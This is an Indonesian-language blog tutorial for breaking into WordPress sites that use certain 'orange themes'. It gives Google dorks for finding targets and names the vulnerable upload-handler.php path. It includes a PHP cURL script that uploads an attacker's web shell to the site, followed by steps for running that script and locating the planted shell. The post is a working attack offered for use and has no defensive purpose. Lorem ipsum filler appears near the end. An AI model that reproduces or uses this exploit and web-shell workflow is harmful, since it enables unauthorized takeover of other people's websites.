Assalamualaikum karena saya udah lama gk share tutor di karenakan Sibuk dengan sekolah, mumpung ada waktu luang mau share tutor.. ;)
Exploit orange themes File Upload

Bahan-Bahan:
-XAMPP (Serch Di Google Banyak Kok)
-Shell

Langkah-Langkah:
1).Search Di Google Gunakan Dork

inurl:"/wp-content/themes/bordeaux-theme/"
inurl:"/wp-content/themes/bulteno-theme/"
inurl:"/wp-content/themes/oxygen-theme/"
inurl:"/wp-content/themes/radial-theme/"
inurl:"/wp-content/themes/rayoflight-theme/"
inurl:"/wp-content/themes/reganto-theme/"
inurl:"/wp-content/themes/rockstar-theme/"  

2).Ane Pkek Dork Yang inurl:"/wp-content/themes/radial-theme/"


3).Jika Ketemu Masukan Exploit /wp-content/themes/radial-theme/functions/upload-handler.php jika Keluar Error Situsnya Vuln


4).Buat File Baru Berekstensi .php Contoh lol.php Dan Simpan Script Berikut Di Directory C:/XAMPP/php Masukan Script Berikut Edit-Edit Dikit :D


<?php
$uploadfile="shellKamu.php";
$ch = curl_init("http://site.com/wp-content/themes/radial-theme/functions/upload-handler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('orange_themes'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>



5).Masukan Shell Ente Juga Jadi Ada Dua File Di Directory C:/XAMPP/php yaitu Shell Dan Script Tadi :D



6).Aktifkan XAMPP Klik Start Pada Apache




7).Buka cmd Dengan Cara Klik Start -> Run -> Ketik "cmd"
8).Ketik cd\xampp/php



9)ketik php namascript.php Contoh: php lol.php
10).Jika Succes Akan Ada Nama Shellnya :D


11).Untuk Letak Shellnya Ada Di
http://site.com/wp-content/uploads/2013/11/namashell.php

Axact

Axact

Vestibulum bibendum felis sit amet dolor auctor molestie. In dignissim eget nibh id dapibus. Fusce et suscipit orci. Aliquam sit amet urna lorem. Duis eu imperdiet nunc, non imperdiet libero.

Post A Comment:

0 comments: